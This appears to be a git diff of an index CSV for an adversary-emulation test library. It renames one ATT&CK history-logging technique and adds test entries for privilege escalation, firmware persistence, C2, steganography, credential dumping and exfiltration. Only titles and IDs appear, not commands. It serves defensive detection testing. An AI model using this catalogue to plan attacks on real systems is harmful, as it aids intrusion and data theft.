-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,11,Disable Windows Command Line Auditing using reg.exe,1329d5ab-e10e-4e5e-93d1-4d907eb656e5,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,12,Disable Windows Command Line Auditing using Powershell Cmdlet,95f5c72f-6dfe-45f3-a8c1-d8faa07176fa,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -740,6 +747,7 @@ privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Th
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
@@ -909,6 +917,7 @@ execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
 execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
+execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
 execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
 execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
@@ -996,6 +1005,7 @@ persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append mal
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
+persistence,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
@@ -1082,6 +1092,7 @@ persistence,T1136.002,Create Account: Domain Account,2,Create a new account simi
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
 persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
 persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
+persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell
 persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
 persistence,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
@@ -1209,6 +1220,7 @@ command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query
 command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
+command-and-control,T1071,Application Layer Protocol,1,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,powershell
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
@@ -1220,6 +1232,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec
 command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
 command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
 command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
+command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -1266,6 +1279,8 @@ command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript
 command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
+command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -1278,6 +1293,7 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compress
 collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
 collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
+collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
@@ -1373,6 +1389,7 @@ credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User
 credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
 credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
+credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1533,6 +1550,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1644,6 +1662,7 @@ discovery,T1135,Network Share Discovery,9,WinPwn - shareenumeration,987901d1-5b8
 discovery,T1135,Network Share Discovery,10,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
+discovery,T1120,Peripheral Device Discovery,3,Peripheral Device Discovery via fsutil,424e18fd-48b8-4201-8d3a-bf591523a686,command_prompt
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
@@ -1718,6 +1737,7 @@ discovery,T1049,System Network Connections Discovery,3,"System Network Connectio
 discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
 discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
+discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
@@ -1893,6 +1913,7 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
+exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
@@ -97,16 +97,16 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configur
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
 defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,2,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,14d55b96-b2f5-428d-8fed-49dc4d9dd616,command_prompt
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
@@ -57,8 +57,8 @@ defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5
 defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
+defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt
 defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
@@ -41,6 +42,7 @@ defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
+defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
@@ -144,76 +146,78 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,6,A
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
-defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
-defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
-defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
-defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
-defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
-defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
-defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
-defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
-defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
-defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
